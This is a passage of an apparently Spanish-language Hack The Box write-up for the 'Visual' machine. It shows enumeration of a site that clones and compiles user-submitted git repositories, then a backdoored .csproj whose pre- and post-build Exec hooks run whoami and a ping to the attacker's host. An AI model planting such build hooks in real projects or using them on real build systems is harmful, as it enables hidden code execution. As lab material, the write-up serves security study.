class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span><span class="lnt">32 </span><span class="lnt">33 </span><span class="lnt">34 </span><span class="lnt">35 </span><span class="lnt">36 </span><span class="lnt">37 </span><span class="lnt">38 </span><span class="lnt">39 </span><span class="lnt">40 </span><span class="lnt">41 </span><span class="lnt">42 </span><span class="lnt">43 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl"> π ~/htb/visual ❯ feroxbuster -u http://10.10.11.234/ -w <span class="nv">$MD</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> ___ ___ __ __ __ __ __ ___ </span></span><span class="line"><span class="cl"><span class="p">|</span>__ <span class="p">|</span>__ <span class="p">|</span>__<span class="o">)</span> <span class="p">|</span>__<span class="o">)</span> <span class="p">|</span> / <span class="sb">`</span> / <span class="se">\ \_</span>/ <span class="p">|</span> <span class="p">|</span> <span class="se">\ </span><span class="p">|</span>__ </span></span><span class="line"><span class="cl"><span class="p">|</span> <span class="p">|</span>___ <span class="p">|</span> <span class="se">\ </span><span class="p">|</span> <span class="se">\ </span><span class="p">|</span> <span class="se">\_</span>_, <span class="se">\_</span>_/ / <span class="se">\ </span><span class="p">|</span> <span class="p">|</span>__/ <span class="p">|</span>___ </span></span><span class="line"><span class="cl">by Ben <span class="s2">&#34;epi&#34;</span> Risher 🤓 ver: 2.10.0 </span></span><span class="line"><span class="cl">───────────────────────────┬────────────────────── </span></span><span class="line"><span class="cl"> 🎯 Target Url │ http://10.10.11.234/ </span></span><span class="line"><span class="cl"> 🚀 Threads │ <span class="m">50</span> </span></span><span class="line"><span class="cl"> 📖 Wordlist │ /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt </span></span><span class="line"><span class="cl"> 👌 Status Codes │ All Status Codes! </span></span><span class="line"><span class="cl"> 💥 Timeout <span class="o">(</span>secs<span class="o">)</span> │ <span class="m">7</span> </span></span><span class="line"><span class="cl"> 🦡 User-Agent │ feroxbuster/2.10.0 </span></span><span class="line"><span class="cl"> 💉 Config File │ /etc/feroxbuster/ferox-config.toml </span></span><span class="line"><span class="cl"> 🔎 Extract Links │ <span class="nb">true</span> </span></span><span class="line"><span class="cl"> 🏁 HTTP methods │ <span class="o">[</span>GET<span class="o">]</span> </span></span><span class="line"><span class="cl"> 🔃 Recursion Depth │ <span class="m">4</span> </span></span><span class="line"><span class="cl">───────────────────────────┴────────────────────── </span></span><span class="line"><span class="cl"> 🏁 Press <span class="o">[</span>ENTER<span class="o">]</span> to use the Scan Management Menu™ </span></span><span class="line"><span class="cl">────────────────────────────────────────────────── </span></span><span class="line"><span class="cl"><span class="m">403</span> GET 9l 30w 302c Auto-filtering found 404-like response and created new filter<span class="p">;</span> toggle off with --dont-filter </span></span><span class="line"><span class="cl"><span class="m">404</span> GET 9l 33w 299c Auto-filtering found 404-like response and created new filter<span class="p">;</span> toggle off with --dont-filter </span></span><span class="line"><span class="cl"><span class="m">200</span> GET 0l 0w 0c http://10.10.11.234/submit.php </span></span><span class="line"><span class="cl"><span class="m">200</span> GET 7l 36w 336c http://10.10.11.234/js/scripts.js </span></span><span class="line"><span class="cl"><span class="m">200</span> GET 8l 29w 28898c http://10.10.11.234/assets/favicon.ico </span></span><span class="line"><span class="cl"><span class="m">301</span> GET 9l 30w 339c http://10.10.11.234/uploads <span class="o">=</span>&gt; http://10.10.11.234/uploads/ </span></span><span class="line"><span class="cl"><span class="m">200</span> GET 11559l 23754w 250218c http://10.10.11.234/css/styles.css </span></span><span class="line"><span class="cl"><span class="m">200</span> GET 117l 555w 7534c http://10.10.11.234/ </span></span><span class="line"><span class="cl"><span class="m">301</span> GET 9l 30w 338c http://10.10.11.234/assets <span class="o">=</span>&gt; http://10.10.11.234/assets/ </span></span><span class="line"><span class="cl"><span class="m">301</span> GET 9l 30w 335c http://10.10.11.234/css <span class="o">=</span>&gt; http://10.10.11.234/css/ </span></span><span class="line"><span class="cl"><span class="m">301</span> GET 9l 30w 334c http://10.10.11.234/js <span class="o">=</span>&gt; http://10.10.11.234/js/ </span></span><span class="line"><span class="cl"><span class="m">503</span> GET 11l 44w 402c http://10.10.11.234/examples </span></span><span class="line"><span class="cl"><span class="m">403</span> GET 11l 47w 421c http://10.10.11.234/licenses </span></span><span class="line"><span class="cl"><span class="m">301</span> GET 9l 30w 338c http://10.10.11.234/Assets <span class="o">=</span>&gt; http://10.10.11.234/Assets/ </span></span><span class="line"><span class="cl"><span class="m">200</span> GET 8l 29w 28898c http://10.10.11.234/Assets/favicon.ico </span></span><span class="line"><span class="cl"><span class="m">301</span> GET 9l 30w 335c http://10.10.11.234/CSS <span class="o">=</span>&gt; http://10.10.11.234/CSS/ </span></span><span class="line"><span class="cl"><span class="m">200</span> GET 11559l 23754w 250218c http://10.10.11.234/CSS/styles.css </span></span><span class="line"><span class="cl"><span class="m">301</span> GET 9l 30w 334c http://10.10.11.234/JS <span class="o">=</span>&gt; http://10.10.11.234/JS/ </span></span><span class="line"><span class="cl"><span class="m">200</span> GET 7l 36w 336c http://10.10.11.234/JS/scripts.js </span></span><span class="line"><span class="cl"><span class="m">403</span> GET 11l 47w 421c http://10.10.11.234/phpmyadmin </span></span><span class="line"><span class="cl"><span class="m">301</span> GET 9l 30w 339c http://10.10.11.234/Uploads <span class="o">=</span>&gt; http://10.10.11.234/Uploads/ </span></span><span class="line"><span class="cl"><span class="m">403</span> GET 11l 47w 421c http://10.10.11.234/webalizer </span></span><span class="line"><span class="cl"><span class="m">403</span> GET 11l 47w 421c http://10.10.11.234/server-status </span></span></code></pre></td></tr></table> </div> </div><h1 id="visual-studio">Visual Studio</h1> <p>El sitio espera una direccion de un repositorio, intentamos con un servidor http para ver las solicitudes que realiza el sitio, al enviar una direccion nos muestra un mensaje de espera.</p> <p><img src="https://sckull.github.io/images/posts/htb/visual/Screenshot_2023_10_1_052347.png" alt="image"></p> <p>Se muestra que intenta acceder al archivo refs.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl"> π ~/htb/visual/www ❯ httphere . </span></span><span class="line"><span class="cl">Serving HTTP on 0.0.0.0 port <span class="m">80</span> <span class="o">(</span>http://0.0.0.0:80/<span class="o">)</span> ... </span></span><span class="line"><span class="cl">10.10.11.234 - - <span class="o">[</span>30/Oct/2023 19:23:47<span class="o">]</span> code 404, message File not found </span></span><span class="line"><span class="cl">10.10.11.234 - - <span class="o">[</span>30/Oct/2023 19:23:47<span class="o">]</span> <span class="s2">&#34;GET /info/refs?service=git-upload-pack HTTP/1.1&#34;</span> <span class="m">404</span> - </span></span></code></pre></td></tr></table> </div> </div><p>Por otro lado el sitio muestra que no encontro el archivo .snl.</p> <p><img src="https://sckull.github.io/images/posts/htb/visual/Screenshot_2023_10_1_052605.png" alt="image"></p> <h2 id="project">Project</h2> <p>Con Visual Studio creamos un nuevo proyecto utilizando la plantilla de aplicacion de consola, seleccionando finalmente la version 6.0 de .NET.</p> <p><img src="https://sckull.github.io/images/posts/htb/visual/Screenshot_2023_10_1_052718.png" alt="image"><br /> <img src="https://sckull.github.io/images/posts/htb/visual/Screenshot_2023_10_1_052838.png" alt="image"><br /> <img src="https://sckull.github.io/images/posts/htb/visual/Screenshot_2023_10_1_053012.png" alt="image"><br /> <img src="https://sckull.github.io/images/posts/htb/visual/Screenshot_2023_10_1_053125.png" alt="image"></p> <p>Nuestro proyecto tiene como codigo una sola linea de hola mundo.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-c#" data-lang="c#"><span class="line"><span class="cl"><span class="n">Console</span><span class="p">.</span><span class="n">WriteLine</span><span class="p">(</span><span class="s">&#34;Hello, World!&#34;</span><span class="p">);</span> </span></span></code></pre></td></tr></table> </div> </div><h2 id="repository">Repository</h2> <p>Creamos un repositorio para nuestro proyecto utilizando git agregamos el archivo README y realizamos commit.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl"> π ~/htb/visual ❯ mkdir superapp </span></span><span class="line"><span class="cl"> π ~/htb/visual ❯ <span class="nb">cd</span> superapp </span></span><span class="line"><span class="cl"> π ~/htb/visual/superapp ❯ git init </span></span><span class="line"><span class="cl">hint: Using <span class="s1">&#39;master&#39;</span> as the name <span class="k">for</span> the initial branch. This default branch name </span></span><span class="line"><span class="cl">hint: is subject to change. To configure the initial branch name to use in all </span></span><span class="line"><span class="cl">hint: of your new repositories, which will suppress this warning, call: </span></span><span class="line"><span class="cl">hint: </span></span><span class="line"><span class="cl">hint: git config --global init.defaultBranch &lt;name&gt; </span></span><span class="line"><span class="cl">hint: </span></span><span class="line"><span class="cl">hint: Names commonly chosen instead of <span class="s1">&#39;master&#39;</span> are <span class="s1">&#39;main&#39;</span>, <span class="s1">&#39;trunk&#39;</span> and </span></span><span class="line"><span class="cl">hint: <span class="s1">&#39;development&#39;</span>. The just-created branch can be renamed via this command: </span></span><span class="line"><span class="cl">hint: </span></span><span class="line"><span class="cl">hint: git branch -m &lt;name&gt; </span></span><span class="line"><span class="cl">Initialized empty Git repository in /home/kali/htb/visual/superapp/.git/ </span></span><span class="line"><span class="cl"> π superapp master ❯ <span class="nb">echo</span> <span class="s2">&#34;hey&#34;</span> &gt; README.md </span></span><span class="line"><span class="cl"> π superapp master ✗ ❯ git add README.md </span></span><span class="line"><span class="cl"> π superapp master ✗ ❯ git commit -m <span class="s1">&#39;1 file.&#39;</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>master <span class="o">(</span>root-commit<span class="o">)</span> 1265ccb<span class="o">]</span> <span class="m">1</span> file. </span></span><span class="line"><span class="cl"> <span class="m">1</span> file changed, <span class="m">1</span> insertion<span class="o">(</span>+<span class="o">)</span> </span></span><span class="line"><span class="cl"> create mode <span class="m">100644</span> README.md </span></span><span class="line"><span class="cl"> π superapp master ❯ </span></span></code></pre></td></tr></table> </div> </div><h2 id="git-http-server">Git HTTP Server</h2> <p>Ejecutamos <a href="https://github.com/petersalomonsen/githttpserver">Git HTTP Server</a> el cual permite acceder a repositorios, en este caso ejecutamos el servidor una carpeta por encima de nuestro repositorio.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl"><span class="c1"># install</span> </span></span><span class="line"><span class="cl"><span class="c1"># npm install -g git-http-server</span> </span></span><span class="line"><span class="cl"> π superapp master ❯ <span class="nb">cd</span> .. </span></span><span class="line"><span class="cl"> π ~/htb/visual ❯ ll </span></span><span class="line"><span class="cl">total 24K </span></span><span class="line"><span class="cl">-rw-r--r-- <span class="m">1</span> kali kali <span class="m">590</span> Oct <span class="m">30</span> 18:40 nmap_scan </span></span><span class="line"><span class="cl">drwxr-xr-x <span class="m">3</span> kali kali 4.0K Oct <span class="m">30</span> 19:36 superapp </span></span><span class="line"><span class="cl">drwxr-xr-x <span class="m">2</span> kali kali 4.0K Oct <span class="m">30</span> 28:57 www </span></span><span class="line"><span class="cl"> π ~/htb/visual ❯ git-http-server -p <span class="m">9090</span> </span></span><span class="line"><span class="cl">listening on http://0.0.0.0:9090 in /home/kali/htb/visual </span></span></code></pre></td></tr></table> </div> </div><p>Realizamos una prueba, vemos que funciona correctamente.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl"> π ~/htb/visual ❯ mkdir tmp </span></span><span class="line"><span class="cl"> π ~/htb/visual ❯ <span class="nb">cd</span> tmp </span></span><span class="line"><span class="cl"> π ~/htb/visual/tmp ❯ git clone http://0.0.0.0:9090/superapp </span></span><span class="line"><span class="cl">Cloning into <span class="s1">&#39;superapp&#39;</span>... </span></span><span class="line"><span class="cl">remote: Enumerating objects: 3, <span class="k">done</span>. </span></span><span class="line"><span class="cl">remote: Counting objects: 100% <span class="o">(</span>3/3<span class="o">)</span>, <span class="k">done</span>. </span></span><span class="line"><span class="cl">remote: Total <span class="m">3</span> <span class="o">(</span>delta 0<span class="o">)</span>, reused <span class="m">0</span> <span class="o">(</span>delta 0<span class="o">)</span>, pack-reused <span class="m">0</span> </span></span><span class="line"><span class="cl">Unpacking objects: 100% <span class="o">(</span>3/3<span class="o">)</span>, <span class="m">186</span> bytes <span class="p">|</span> 186.00 KiB/s, <span class="k">done</span>. </span></span><span class="line"><span class="cl"> π ~/htb/visual/tmp ❯ ls </span></span><span class="line"><span class="cl">superapp </span></span><span class="line"><span class="cl"> π ~/htb/visual/tmp ❯ <span class="nb">cd</span> superapp </span></span><span class="line"><span class="cl"> π superapp master ❯ ls </span></span><span class="line"><span class="cl">README.md </span></span><span class="line"><span class="cl"> π superapp master ❯ cat README.md </span></span><span class="line"><span class="cl">hey </span></span><span class="line"><span class="cl"> π superapp master ❯ </span></span></code></pre></td></tr></table> </div> </div><h2 id="compile">Compile</h2> <p>Agregamos nuestro proyecto de Visual Studio a nuestro repositorio.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl"> π superapp master ✗ ❯ git add . </span></span><span class="line"><span class="cl"> π superapp master ✗ ❯ git commit -m <span class="s1">&#39;superdupperapp&#39;</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>master fba2596<span class="o">]</span> superdupperapp </span></span><span class="line"><span class="cl"> <span class="m">14</span> files changed, <span class="m">239</span> insertions<span class="o">(</span>+<span class="o">)</span> </span></span><span class="line"><span class="cl"> create mode <span class="m">100644</span> superdupperapp.sln </span></span><span class="line"><span class="cl"> create mode <span class="m">100644</span> superdupperapp/Program.cs </span></span><span class="line"><span class="cl"> create mode <span class="m">100644</span> superdupperapp/obj/Debug/net6.0/.NETCoreApp,Version<span class="o">=</span>v6.0.AssemblyAttributes.cs </span></span><span class="line"><span class="cl"> create mode <span class="m">100644</span> superdupperapp/obj/Debug/net6.0/superdupperapp.AssemblyInfo.cs </span></span><span class="line"><span class="cl"> create mode <span class="m">100644</span> superdupperapp/obj/Debug/net6.0/superdupperapp.AssemblyInfoInputs.cache </span></span><span class="line"><span class="cl"> create mode <span class="m">100644</span> superdupperapp/obj/Debug/net6.0/superdupperapp.GeneratedMSBuildEditorConfig.editorconfig </span></span><span class="line"><span class="cl"> create mode <span class="m">100644</span> superdupperapp/obj/Debug/net6.0/superdupperapp.GlobalUsings.g.cs </span></span><span class="line"><span class="cl"> create mode <span class="m">100644</span> superdupperapp/obj/Debug/net6.0/superdupperapp.assets.cache </span></span><span class="line"><span class="cl"> create mode <span class="m">100644</span> superdupperapp/obj/project.assets.json </span></span><span class="line"><span class="cl"> create mode <span class="m">100644</span> superdupperapp/obj/project.nuget.cache </span></span><span class="line"><span class="cl"> create mode <span class="m">100644</span> superdupperapp/obj/superdupperapp.csproj.nuget.dgspec.json </span></span><span class="line"><span class="cl"> create mode <span class="m">100644</span> superdupperapp/obj/superdupperapp.csproj.nuget.g.props </span></span><span class="line"><span class="cl"> create mode <span class="m">100644</span> superdupperapp/obj/superdupperapp.csproj.nuget.g.targets </span></span><span class="line"><span class="cl"> create mode <span class="m">100644</span> superdupperapp/superdupperapp.csproj </span></span><span class="line"><span class="cl"> π superapp master ❯ ll </span></span><span class="line"><span class="cl">total 12K </span></span><span class="line"><span class="cl">-rw-r--r-- <span class="m">1</span> kali kali <span class="m">4</span> Oct <span class="m">30</span> 19:36 README.md </span></span><span class="line"><span class="cl">drwxr-xr-x <span class="m">4</span> kali kali 4.0K Oct <span class="m">30</span> 17:35 superdupperapp </span></span><span class="line"><span class="cl">-rw-r--r-- <span class="m">1</span> kali kali 1.2K Oct <span class="m">30</span> 17:31 superdupperapp.sln </span></span><span class="line"><span class="cl"> π superapp master ❯ </span></span></code></pre></td></tr></table> </div> </div><p>Enviamos nuestra direccion url de nuestro repositorio, nuevamente nos muestra un mensaje de espera.</p> <p><img src="https://sckull.github.io/images/posts/htb/visual/Screenshot_2023_10_1_054639.png" alt="image"></p> <p>El log del servidor muestra que se accedieron a dos archivos.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">10.10.11.234 - - <span class="o">[</span>30/Oct/2023:19:47:32 -0400<span class="o">]</span> <span class="s2">&#34;GET /superapp/info/refs?service=git-upload-pack HTTP/1.1&#34;</span> <span class="m">200</span> - <span class="s2">&#34;-&#34;</span> <span class="s2">&#34;git/2.41.0.windows.1&#34;</span> </span></span><span class="line"><span class="cl">10.10.11.234 - - <span class="o">[</span>30/Oct/2023:19:47:33 -0400<span class="o">]</span> <span class="s2">&#34;POST /superapp/git-upload-pack HTTP/1.1&#34;</span> <span class="m">200</span> - <span class="s2">&#34;-&#34;</span> <span class="s2">&#34;git/2.41.0.windows.1&#34;</span> </span></span></code></pre></td></tr></table> </div> </div><p>Luego de unos segundos nos muestra una lista de archivos y mensaje, la compilacion fue exitosa.</p> <p><img src="https://sckull.github.io/images/posts/htb/visual/Screenshot_2023_10_1_054831.png" alt="image"></p> <p>Tras descargar los archivos realizamos la ejecucion del programa, vemos que se muestra con exito el mensaje esperado.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-cmd" data-lang="cmd"><span class="line"><span class="cl">PS C:\users\sckull\documents\htb\visual\tmp<span class="p">&gt;</span> dir </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> Directory: C:\users\sckull\documents\htb\visual\tmp </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Mode LastWriteTime Length Name </span></span><span class="line"><span class="cl">---- ------------- ------ ---- </span></span><span class="line"><span class="cl">-a---- 10/30/2023 6:01 PM 434 superdupperapp.deps.json </span></span><span class="line"><span class="cl">-a---- 10/30/2023 5:50 PM 4608 superdupperapp.dll </span></span><span class="line"><span class="cl">-a---- 10/30/2023 5:49 PM 147968 superdupperapp.exe </span></span><span class="line"><span class="cl">-a---- 10/30/2023 6:01 PM 147 superdupperapp.runtimeconfig.json </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">PS C:\users\sckull\documents\htb\visual\tmp<span class="p">&gt;</span> .\superdupperapp.exe </span></span><span class="line"><span class="cl">Hello, World! </span></span><span class="line"><span class="cl">PS C:\users\sckull\documents\htb\visual\tmp&gt; </span></span></code></pre></td></tr></table> </div> </div><h1 id="malicious-project---visual-studio">Malicious Project - Visual Studio</h1> <p>Tras investigar sobre proyectos maliciosos de Visual Studio nos topamos con multiples articulos ( <a href="https://outflank.nl/blog/2023/03/28/attacking-visual-studio-for-initial-access/">1</a>, <a href="https://www.microsoft.com/en-us/security/blog/2021/01/28/zinc-attacks-against-security-researchers/">2</a>, <a href="https://blog.google/threat-analysis-group/new-campaign-targeting-security-researchers/">3</a>) que hablan sobre ataques usando proyectos de visual studio con una puerta trasera (backdoor), se menciona el uso de <a href="https://learn.microsoft.com/en-us/cpp/build/how-to-use-build-events-in-msbuild-projects?view=msvc-160">custom build events</a> los cuales se ejecutan al compilar un proyecto, aunque se muestra unicamente para proyectos en C++.</p> <p>En el caso de proyectos en C# las <a href="https://learn.microsoft.com/en-us/visualstudio/ide/how-to-specify-build-events-csharp?view=vs-2022">custom builds events</a> son distintas y se pueden <a href="https://learn.microsoft.com/en-us/visualstudio/ide/how-to-specify-build-events-csharp?view=vs-2022#specify-a-build-event">especificar</a> o editar en visual studio, tambien se pueden agregar directamente <a href="https://learn.microsoft.com/en-us/visualstudio/ide/how-to-specify-build-events-csharp?view=vs-2022#in-the-project-file">al archivo del proyecto</a>.</p> <h2 id="custom-builds-events">Custom Builds Events</h2> <p>Agregamos un prebuildevent y postbuildevent ejecutando un whoami al archivo <code>.csproj</code> de nuestro proyecto.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-xml" data-lang="xml"><span class="line"><span class="cl"><span class="nt">&lt;Project</span> <span class="na">Sdk=</span><span class="s">&#34;Microsoft.NET.Sdk&#34;</span><span class="nt">&gt;</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="nt">&lt;PropertyGroup&gt;</span> </span></span><span class="line"><span class="cl"> <span class="nt">&lt;OutputType&gt;</span>Exe<span class="nt">&lt;/OutputType&gt;</span> </span></span><span class="line"><span class="cl"> <span class="nt">&lt;TargetFramework&gt;</span>net6.0<span class="nt">&lt;/TargetFramework&gt;</span> </span></span><span class="line"><span class="cl"> <span class="nt">&lt;ImplicitUsings&gt;</span>enable<span class="nt">&lt;/ImplicitUsings&gt;</span> </span></span><span class="line"><span class="cl"> <span class="nt">&lt;Nullable&gt;</span>enable<span class="nt">&lt;/Nullable&gt;</span> </span></span><span class="line"><span class="cl"> <span class="nt">&lt;/PropertyGroup&gt;</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="nt">&lt;Target</span> <span class="na">Name=</span><span class="s">&#34;PreBuild&#34;</span> <span class="na">BeforeTargets=</span><span class="s">&#34;PreBuildEvent&#34;</span><span class="nt">&gt;</span> </span></span><span class="line"><span class="cl"> <span class="nt">&lt;Exec</span> <span class="na">Command=</span><span class="s">&#34;whoami&#34;</span> <span class="nt">/&gt;</span> </span></span><span class="line"><span class="cl"><span class="nt">&lt;/Target&gt;</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="nt">&lt;Target</span> <span class="na">Name=</span><span class="s">&#34;PostBuild&#34;</span> <span class="na">AfterTargets=</span><span class="s">&#34;PostBuildEvent&#34;</span><span class="nt">&gt;</span> </span></span><span class="line"><span class="cl"> <span class="nt">&lt;Exec</span> <span class="na">Command=</span><span class="s">&#34;whoami&#34;</span> <span class="nt">/&gt;</span> </span></span><span class="line"><span class="cl"><span class="nt">&lt;/Target&gt;</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="nt">&lt;/Project&gt;</span> </span></span></code></pre></td></tr></table> </div> </div><p>Al compilar nuestra solucion ambos comandos se ejecutaron (localmente).</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span><span class="lnt">6 </span><span class="lnt">7 </span><span class="lnt">8 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl"><span class="c1"># output</span> </span></span><span class="line"><span class="cl">Build started... </span></span><span class="line"><span class="cl">1&gt;------ Build started: Project: superdupperapp, Configuration: Debug Any CPU ------ </span></span><span class="line"><span class="cl">1&gt;desktop-jajas<span class="se">\s</span>ckull <span class="c1"># &lt;----- PreBuildEvent</span> </span></span><span class="line"><span class="cl">1&gt;superdupperapp -&gt; C:<span class="se">\U</span>sers<span class="se">\u</span>ser<span class="se">\D</span>ocuments<span class="se">\h</span>tb<span class="se">\v</span>isual<span class="se">\s</span>uperdupperapp<span class="se">\s</span>uperdupperapp<span class="se">\b</span>in<span class="se">\D</span>ebug<span class="se">\n</span>et6.0<span class="se">\s</span>uperdupperapp.dll </span></span><span class="line"><span class="cl">1&gt;desktop-jajas<span class="se">\s</span>ckull <span class="c1"># &lt;----- PostBuildEvent</span> </span></span><span class="line"><span class="cl"><span class="o">==========</span> Build: <span class="m">1</span> succeeded, <span class="m">0</span> failed, <span class="m">0</span> up-to-date, <span class="m">0</span> <span class="nv">skipped</span> <span class="o">==========</span> </span></span><span class="line"><span class="cl"><span class="o">==========</span> Build started at 7:19 PM and took 00.324 <span class="nv">seconds</span> <span class="o">==========</span> </span></span></code></pre></td></tr></table> </div> </div><h2 id="test-ping">Test Ping</h2> <p>Agregamos esta vez un ping hacia nuestra maquina esta vez en nuestro repositorio.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-xml" data-lang="xml"><span class="line"><span class="cl"><span class="nt">&lt;Target</span> <span class="na">Name=</span><span class="s">&#34;PreBuild&#34;</span> <span class="na">BeforeTargets=</span><span class="s">&#34;PreBuildEvent&#34;</span><span class="nt">&gt;</span> </span></span><span class="line"><span class="cl"> <span class="nt">&lt;Exec</span> <span class="na">Command=</span><span class="s">&#34;cmd /c ping 10.10.15.0&#34;</span> <span class="nt">/&gt;</span> </span></span><span class="line"><span class="cl"><span class="nt">&lt;/Target&gt;</span> </span></span></code></pre></td></tr></table> </div> </div><p>Tras hacer comit y enviar nuestro repositorio al sitio obtuvimos multiples solicitudes de la maquina.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 